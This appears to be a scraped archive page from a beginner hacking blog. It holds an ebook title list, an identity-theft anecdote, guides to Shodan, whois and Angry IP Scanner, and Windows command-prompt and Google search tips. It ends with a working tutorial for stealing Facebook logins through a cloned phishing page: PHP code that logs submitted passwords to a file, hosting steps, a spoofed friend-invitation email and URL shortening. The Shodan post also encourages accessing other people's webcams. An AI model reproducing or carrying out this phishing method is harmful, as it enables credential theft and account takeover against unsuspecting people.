Category Archives: (C) Beginner Hacking

Hacking Free Ebooks Collection 2018

List of Free Hacking Ebooks Download In PDF 2018 Ethical Hacking, Hacking Ebooks pdf, Hacking ebooks free download, hacking ebooks collection, Best Hacking eBooks.

Disclaimer: The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.

DMCA takedown cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded. To know more on DMCA takedown policy here.

1. Advanced Penetration Testing Hacking 2017.pdf

2. CEH v9 Certified Ethical Hacker Version 9.pdf

3. Begin Ethical Hacking with Python.pdf

4. Certified Ethical Hacker 2016.pdf

5. Essential Skills for Hackers.pdf

6. Hacking 2016.pdf

7. Hacking the Hacker 2017.pdf

8. The Art of Invisibility 2017.pdf

9. Penetration Testing Basics.pdf

10. Penetration Testing Essentials 2017.pdf

11. Security.pdf

12. Hackers Beware.pdf

13. Network Performance and Security.pdf

14. Advanced_Persistent_Threat_Hacking.pdf

15. Modern Web Penetration Testing 2016.pdf

16. From Hacking to Report Writing.pdf

17. Python Web Penetration Testing Cookbook.pdf

18. CompTIA Cybersecurit 2017.pdf

18.IT final.pdf

19. Wireshark for Security Professionals 2016.pdf

20. Cyber-Physical Attack Recover.pdf

21. Honeypots and Routers_ Collecting Internet Attacks.pdf

22. Practical Information Security Management 2016.pdf

23. Phishing Dark Waters.pdf

24. Network Attacks and Exploitation.pdf

25. A Hacker.pdf

26. Hacker School.pdf

27. Automated Credit Card Fraud.pdf

28. A Beginners Guide To Hacking Computer Systems.pdf

29. 501 Website Hacking Secrets.pdf

30. Cracking Passwords Guide.pdf

31. Eldad Eilam – Reversing: Secrets of Reverse Engineering – Wiley 2005.pdf

32. Metasploit Toolkit – Presentation.pdf

33. Metasploit Toolkit – Syngress.pdf

34. Oracle Rootkits 2.0.pdf

35. Pest Control – Taming the RATS.pdf

36. Practical Malware Analysis.pdf

37. Return Oriented Programming.pdf

38. Web App Hacking (Hackers Handbook).pdf

39. The Basics of Web Hacking – Tools and Techniques to Attack the Web(2013).pdf

40. Syngress – Sockets, Shellcode, Porting & Coding – Reverse Engineering Exploits And Tool Coding For Security Professionals.pdf

41. Stack Smashing.pdf

42. SQL Injection Attacks and Defense.pdf

43. Reverse Engineering for Beginners.pdf

44. Black Book of Viruses and Hacking.pdf

45. Bluepilling the Xen Hypervisor.pdf

46. Computer Viruses, Hacking and Malware attacks for Dummies.pdf

47. Cracking Passwords Guide.pdf

48. Hackers_Secrets.pdf

49. Buffer Overflow Attacks.pdf

50. Exploiting Software – How To Break Code.pdf

51. Grumpy Old Fart’s Big Book of Hacking.pdf

53. Comptia Security+.pdf

54. Hack Attacks Revealed.pdf

55. Hacking Exposed (Laxxuss).pdf

56. Hacking For Dummies (2004) Wiley.pdf

57. Hacking For Dummies – Access To Other Peoples Systems Made Simple.pdf

58. Hacking Into Computer Systems – A Beginners Guide.pdf

59. How To Hack Windows Xp Admin Passwords.pdf

60. Bluetooth Hacking.pdf

61. ETH – Attacks on P2P Networks (Freenet) (2005).pdf

62. Francisco Amato – evilgrade – ENG.pdf

63. Fun With EtterCap Filters.pdf

64. Man_In_The_Middle.pdf

65. arp MITM.pdf

66. ethereal-tcpdump.pdf


68. DEFCON-24-Anto-Joseph-Fuzzing-Android-Devices.pdf

69. DEFCON-24-Bigezy-Saci-Pinworm-MITM-for-Metadata.pdf

70. DEFCON-24-Brad-Dixon-Pin2Pwn-How-to-Root-An-Embedded-Linux-Box-With-A-Sewing-Needle.pdf

71. DEFCON-24-Brad-Woodberg-Malware-Command-And-Control-Channels-A-Journey-Into-Darkness.pdf

72. DEFCON-24-Bryant-Zadegan-Ryan-Lester-Abusing-Bleeding-Edge-Web-Standards-For-Appsec-Glory.pdf

73. DEFCON-24-Chapman-Stone-Toxic-Proxies-Bypassing-HTTPS-and-VPNs.pdf

74. DEFCON-24-Demay-Auditing-6LoWPAN-Networks-Using-Standard-Penetration-Testing-Tools-WP.pdf

75. DEFCON-24-Demay-Auditing-6LoWPAN-Networks-Using-Standard-Penetration-Testing-Tools.pdf

76. DEFCON-24-Fitzpatrick-and-Grand-101-Ways-To-Brick-Your-Hardware.pdf

77. DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering.pdf

78. DEFCON-24-Thomas-Wilhelm-Hacking-Network-Protocols-Using-Kali.pdf

79. DEFCON-24-Thomas-Wilhelm-Intrusion-Prevention-System-Evasion-Techniques.pdf

80. DEFCON-24-Ulf-Frisk-Direct-Memory-Attack-the-Kernel.pdf

81. EN-Hacking Web Applications Using Cookie Poisoning.pdf

82. EN – NoSQL, No injection – Ron, Shulman-Peleg, Bronshtein.pdf

83. Ethical Hacking and Penetration Testing Guide – Baloch, Rafay.pdf

84. Faille-CSRF.pdf

85. Metasploit, Penetration Testers Guide.pdf

86. Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2).pdf

87. Ninja Hacking.pdf

88. OWASP_Stammtisch_Frankfurt_WAF_Profiling_and_Evasion.pdf

89. Pentesting With Burp Suite.pdf

90. Phishing Dark Waters The Offensive and Defensive Sides of Malicious Emails.pdf

91. Seven Deadliest Network Attacks.pdf

92. Seven Deadliest USB Attacks.pdf

93. Seven Deadliest USB Attacks.pdf

94. Seven Deadliest Web Application Attacks.pdf

95. Seven Deadliest Wireless Technologies Attacks.pdf

96. The 60 Minute Network Security Guide, National Security Agency.pdf

97. The Basics of Hacking and Penetration.pdf

98. WAF Bypassing.pdf

99. Windows_Services_-_All_roads_lead_to_SYSTEM.pdf

100. Web Penetration Testing with Kali Linux.pdf

Identity Theft and Organized Crime

Many identity thieves have a personal connection to victims, and they can even be family members, friends, employers or employees. Not all do, however, as they can also be total strangers who stole your mail, went through your trash or even come from a foreign country.

Why do these criminals do this? People who practice identity theft are usually driven by mental illness, desperation or greed. Some, however, are also organized criminals who will do what it takes to steal the money of others.

Hackers across the globe use tools to access databases that contain valuable information such as:

  • Birth dates
  • Credit card numbers
  • Social Security numbers
  • Home and business addresses
  • Bank account information

These people break into the networks that store this information, steal the data, and then use it to take over existing accounts. In only one day, they can make changes to a victim’s credit card account, transfer money and even take everything.

One of the most notorious cybercriminals in history is Albert Gonzalez. He began with reign of cyber terror at the age of 12, when his home computer became infected with a virus. By learning how to protect his computer from invasions, he also learned how to make a profit from them.

By the age of 14, Gonzalez was regularly using stolen account information to buy things online. He eventually hacked into the servers at NASA, and even after a visit from FBI agents at his school, he did not slow down.

Gonzalez was finally arrested at the age of 22 while at an ATM. He was wearing a woman’s wig, had a fake nose ring, and was using several debit cards in order to obtain cash. Police soon realized who he was, however, and had the leader of a cyber gang in their grasp.

Following his arrest, police convinced Gonzalez to turn on his gang, but he also was a double agent, of sorts.

While helping authorities to capture other cyber criminals, he was continuously stealing, and even pulled off a scheme to have into the network of ATMs at 7-Eleven.

When all was said and done, Gonzalez received A 20-year prison sentance, and it was found that he had access to more than 180 million debit and credit card accounts.

How Hacking is Done

So how do people like Gonzalez hack others? They use a number of different hardware and software, known as penetration-testing tools, to seek out any holes within a network. These holes may be found in an operating system or Internet connection. Hackers also commonly look for vulnerabilities within Internet browsers.

Approximately 15 years ago, criminals began creating viruses that got into a computer, deleted files or crashed hard drives. Today, this is no longer the case. These days, hackers want computers to run smoothly, and the viruses can sit dormant in the hard drive until they become activated in some way. For instance, a modern Trojan may have a design that detects when victims are doing online banking. At this point, they strike.

A virus can easily attack a computer without the operator knowing simply by visiting a website, clicking a link in an email or downloading a certain program.

These are the most common ways to get a virus on your computer, but there are many others. The latest studies should that the number of computer viruses have quadrupled over the past couple of years. On top of this, the criminal hackers will use technology that is brand new and evolving at a faster rate than the technology used by those who are trying to stop the viruses. This is why we should do all we can to protect our computers from viruses.

Shodan a Search Engine for Hackers

Many people have described Shodan as a search engine for hackers, and have even called it “the world’s most dangerous search engine”. It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Inernet Cartographer, hence the shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?

Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding shodan is very important at first you might find it complex but once yu get to know it you will find it very handy in use and  very resourcefull too. So, now let us learn how to work with fasinating search engine. To use shodan to your advantage you have

Follow the steps to register. After registration a link will be sent to your e-mail ID for your activation of account on Shodan. Once your account is activated login to Shodan and now that you are logged in you are free to search anything.

Here are some examples for which you can use shodan to search up the things you want.


When you search for webcam, it will show you all the webcam present in the world. It will show the results as shown in the image below :

Traffic Signals

Searching about traffic signals or traffic signals camera then it will show you all the traffic surveillance camera present.


Searching about cisco will show you all the cisco routers in the world but you can search them by country. Like, here, i have found cisco routers in India and result is below image :


You can also search about Scada and you will get its information around the whole world as shown :


Shodan can also show you about all the netcams in world and you can access them too with your hacking skills.


Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.


Not only the devices but it can help find which port is open in which device. For example I have here searched port : 1723. Now we all know this port is used for VPN so through this we can know which device is using VPN as shown in image below :

When you search for port : 3389 it will show the operating system used by the device too which can be very useful.

This is how Shodan is useful for hackers as it gives all the information necessary to collect that too all over the world. And so you can manipulate this information as you desire.

Using Whois From Command Prompt In Windows

Here We Will See How To Use Whois From Command Prompt In Windows

Step1 : Download Whois From Here

Alternate Link :

Step 2 Go To The Path Where You Extract The Zip Of Whois In Our Case It Is C:\tools\WhoIs

Step 3 : Enter Ip Address Or Website Name Followed By Whois

Example :  “Whois” And Press Enter

For Queries Comment Below

Angry IP Scanner – How to Use and Download

What is Angry IP Scanner?

Angry IP Scanner is a simple fast and effective portable program to scan and manage IP details and configurations. It is a free program and you can easily use and download this program from the sourceforge website.

Supported Operating System

  • Windows XP
  • Windows VISTA
  • Windows 7
  • Windows 8
  • Windows 10
  • Mac OS X
  • Linux

Will work with previous version of Windows but support is very limited.

Is this a virus?

No, it is not a virus. It is simple network program designed for System Admin and Network professionals. Some antivirus might show some warning for this program which is a false positive alarm. Ignore it or add to allow list.

Features :

Some of the brilliant features of Angry IP Scanner program are –
  1. Small and Efficient
  2. Fast port scanner
  3. Reverse look up IP address
  4. Mac  Address Look up
  5. Complete IP range support from to
  6. Automatic OS detection
  7. No Adware Malware or Advertisement pop ups.
  8. Additional Network Configuration Tools

How to Use Angry IP Scanner Tutorial

If you are a home user with a single computer you have nothing much to do with this tool apart from scanning your ISP and detecting open ports on the connected network range. Make sure you do not break any of your country law as some countries block the use of IP scans.
Network Admin will love this tool for what it is capable of achieving in a few seconds (depending upon the IP block range you are exploring). These are some of the important things which can help you out with your Network management –

Scan for Open ports

  1. Specify the IP range of your network
  2. Enter Hostname
  3. Select Netmask from the drop down
  4. Press the start button
  5. Wait till complete scan is completed
Now the ones in Red are dead connections and the blue dots are live systems. By default you will shown the Ping time, hostname and Ports associated with the particular IP address.

Look up Mac Address

  1. Follow the same steps as mentioned above
  2. Right click any IP you want to know Mac address
  3. Select Show details
  4. You will now be shown Mac address and other details
  5. Select IP address you want to check for open ports
  6. Right click it and select scan all ports
  7. Get the complete list in a few seconds

Search for All open ports

There are many additional tasks that you can do with this open source program. You can join the Discussion here.

Download Angry IP Scanner

You use the following links to download this program to your computer –
If you are facing any problem using this program you can ask for help in the comment section. Use this program responsibly.

15 Useful Command Prompt Tricks You Might Not Know

1. Get help on almost every Command

command-prompt-tricks (1)

This is especially helpful for beginners, but advanced users may get to learn few things too. You can easily get info on almost every command you provide in the Command Prompt. Information includes complete details of what a command does and what process are used, it may also show some examples.

To get the help, just type “/?” at the end of the command of which you need info. For example, you can type “ipconfig/?”, and you will get all the info.

2. Use Function Keys

You can use function keys (F1, F2, F3, etc.) right inside command prompt and get different results. Below are the uses of functions keys in Command Prompt:

  • F1: Pastes per character last used command
  • F2: Pastes last used command only to a specified command character
  • F3: Pastes Last used command
  • F4: Delete command only to a specified command character
  • F5: Pastes last used command without cycling
  • F6: Pastes ^Z
  • F7: Provides a list of already used commands (selectable)
  • F:8 Pastes cycleable used commands
  • F9: Will let you paste command from the list of recently used commands

3. Save a Command to a File

command-prompt-tricks (2)

If you want to save results of a command to a .txt for future reference, then it is quite easy as well. All you need to do is add “> (destination/file name with .txt extension)” at the end of the command you are about to execute.

For example, you can type “ipconfig > c:\Networkdetails.txt”, this command will create a .txt file in C drive with name “Networkdetails”.

4. Copy Data from the Command Prompt

command-prompt-tricks (3)

Copying data from the Command Prompt isn’t just a Ctrl+C away, the process is actually different. It is not that hard, just right click anywhere in the window and click on “Mark” from the menu. After that, just select the text you want to copy and hit Enter to copy it.

Important Note: With Windows 10, Ctrl+C and Ctrl+V commands to copy/paste has been enabled in Command Prompt. So you don’t need to follow the above process, if you are using Windows 10. Also, In Windows 10 keyboard shortcuts for CMD are enabled by default which wasn’t the case with earlier version of Windows.

5. Cycle Through Folders

Specifying exact directories can be a bit frustrating task if you don’t have the destination copied. However, if you just know in which drive or folder the required folder is located, then you can cycle through all the folders to reach it. To do this, just type specified drive and start press TAB key on your keyboard to cycle through all the folders inside it.

6. Use QuickEdit Mode

command-prompt-tricks (4)

Command Prompt comes with QuickEdit Mode to quickly copy and paste content with just your right-click. In QuickEdit mode, you can highlight content and right-click to copy it or right-click in a blank area to paste content from the clipboard (if there is any).

To enable QuickEdit Mode, right-click on the top of the Command Prompt interface (where exit button is located) and select “Properties”. In the properties, check the checkbox next to “QuickEdit Mode” to enable it (you will have to disable it later).

7. Check IP address of any Website

command-prompt-tricks (5)

You can see IP address of any website just by entering “nslookup” command along with the name of the website. For example, you can type “nslookup” to find its IP address.

8. Execute Multiple Commands

command-prompt-tricks (6)

You can easily execute one command after another by provide all the commands and putting “&&” between each command (may save some time). For example, you can type “ipconfig && dir” to execute both commands one after another.

9. Check Default Programs

command-prompt-tricks (7)

You can check which applications are used to open specific types of programs. For this purpose, just type “assoc” in the Command Prompt and hit enter. You will see all the extensions and their associated program that opens them written next to them.

10. Get PC Drivers List

command-prompt-tricks (8)

You can open list of all the drivers installed on your PC with just a single command. Just type “driverquery” in the Command Prompt and press Enter. After a short delay, you will see all the drivers installed in your PC along with, Name, Type and Link date.

11. Scan System Files

command-prompt-tricks (9)

The system files can also be scanned and repaired from the Command Prompt. Type “sfc/scannow” and press enter, the scan will start and may take quite some time depending on your PC speed (up to an hour may be). It will either automatically repair the files or let you know if there is a problem and provide its details.

12. Change Command Prompt Color

command-prompt-tricks (10)

You can also change command prompt color to make it look less dull and a bit easy on the eyes. To do so, right-click at the top corners of Command Prompt and select “Properties” from the menu. In the properties, navigate to “Colors” tab and you will find all the options to change color of both text and background.

13. Create Undelete-able Folders

command-prompt-tricks (11)

You can create undeletable folders using specific set of keywords. In the Command Prompt, type the name of the drive where you want to create the folder (it must not have Windows installed in it). After that, type any of these keywords “md con\” or “md lpt1\” and press Enter. So it should look something like this “D: md con\”.

This will create a folder with the same name that could not be deleted or renamed. To delete the folder replace “md con\” with “rd con\” or “md lpt1\” with “rd lpt1\”.

14. Get Network Details

command-prompt-tricks (12)

You can get quick network details, like IP address and subnet mask or Default Gateway with a single command. Type “ipconfig” and press Enter, you will see all the details of your network.

15. Hide Files and Folders using Command Prompt

command-prompt-tricks (13)

You can hide folder with the help of Command Prompt that cannot be accessed using the traditional hide feature of Windows. To do this, type the drive name where the folder is located and then enter this command “Attrib +h +s +r” and afterwards, enter the name of the file/folder you want to hide. So it should look something like this “D: Attrib +h +s +r haider”.

If the folder is inside another folder, then the command must come before the folder/file you want to hide not just after the Drive name. To again see the folder, use the same process above but change the command to “Attrib -h -s -r” from “Attrib +h +s +r”.

Know when someone opens your email and get reminders to follow up

Find out when, how many times, and which recipeient has opened your message. Also, get the option to auto-create followup reminders for them.

gmail auto followup

Install the Chrome extension FollowUp and sign in using whatever method you prefer. You will also need to grant the app permission to manage your Gmail. Once it’s installed, you will see new options in your Gmail compose window including the option to track that email, send it later, and more.

Learn Best Search Engine Hacks Of All Time

1. Search Exact Phrases – If you’re looking for an exact phrase, use quotation marks around the keywords to view results containing that exact phrase.


2. Exclude a word – If your search terms contain a keyword with several meanings, you can exclude one of the meanings by adding a hyphen (-) before the keyword.


3. Search a specific domain – You can search within a particular URL by including the operator before or after your keywords.


4. Generate similar content – To generate content similar to those found on a URL you already know, use the related: operator before adding the URL.


5. Search for words in text – To retrieve pages where all the keywords appear in the body of the page, use the allintext: operator before the search terms.


6. Search for words in title – Similar to number 5, you can retrieve pages whose titles contain the keywords you’re searching for by using the allintitle: operator.


7. Search for multiple phrases – You can enter more than one query into Google at a time to view pages with one of the specified keywords. Just use a capitalised “OR” to separate the terms.


8. Find news by location – To look for news items emerging from a particular location, use the location: operator, then add the city name.


9. Search by file type – If you’re looking for a specific file on the Web, you can use the filetype: operator to specify the particular document type you’re searching for, and Google will restrict results to pages containing those document types.


10. Forgotten words – An asterisk acts as a wildcard to help you find the missing word in a phrase. You can also get suggestions by using Google’s auto-completion feature. Just type out the full phrase, then delete the word you want to replace.


11. Find a page that links to another url – Using the link: operator, you can find pages that link to another url. This is probably more useful for SEOs who are searching for backlinks to a specific page.


12. Perform calculations on Google Search – You can simply type in the equation and get the result instantly.


13. Find exact sunrise and sunset times in any location


14. Find exact scores of sport games simply by entering the team name or competition.


15. Use Google to determine the local time of any city.


16. Find your public IP address.


17. You don’t need a dictionary; just ask Google.


18. Search for books by your favourite author.


19. And music from your favourite artist.


20. You can view flight schedules on Google.


21. Google can convert between units.


22. And translate from one language to another.


23. Use Google as a countdown timer.


24. Track your packages by entering any UPS, USPS or FedEx tracking number directly into Google to see tracking information about your package.

25. Use Google to view the weather forecast for different cities.


Use these hacks you can improve your productivity by searching Google more efficiently and locate the information you’re looking for faster without having to click through multiple pages. Let us know your thoughts in the comments section below.

How to Hack Facebook Account Using Phising webPage

Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .

Phishing WebPage:
Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to
Right click on the white space of the front page.  Select “View Page source”.
Copy the code to Notepad.

Now find (Press ctrl +f)  for “action=”  in that code.
You fill find the code like this:

The big red ring that circles the action= you have to change. You have to change it to ‘action=”next.php” ‘. after you have done that, you should change the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html

Step 3:
Now we need to create the “next.php” to store the password.  so open the notepad and type the following code:

header(“Location: “);
$handle = fopen(“pswrds.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
fwrite($handle, “rn”);

save this file as “next.php”

Update: I have updated the php script. Now it is working …! Rectified all the problem and errors.

Step 4:
open the notepad and just save the file as “pswrds.txt” without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these, or
use this sites through the secure connection sites(so that you can hide your ip address)  like: .  find best secure connection site.

Step 5:
 create an mail account with facebook keyword like :,,,

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/
Mark it and push the Add hyperlink button
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone “add as a friend”, right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/ .  Just change the delete the link and create link with same text but link to your site.

Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/
but lead to your phisher page..

For user to believe change Your phishing web page url with any of free short url sites.
Like :,,
This will make users to believe that it is correct url.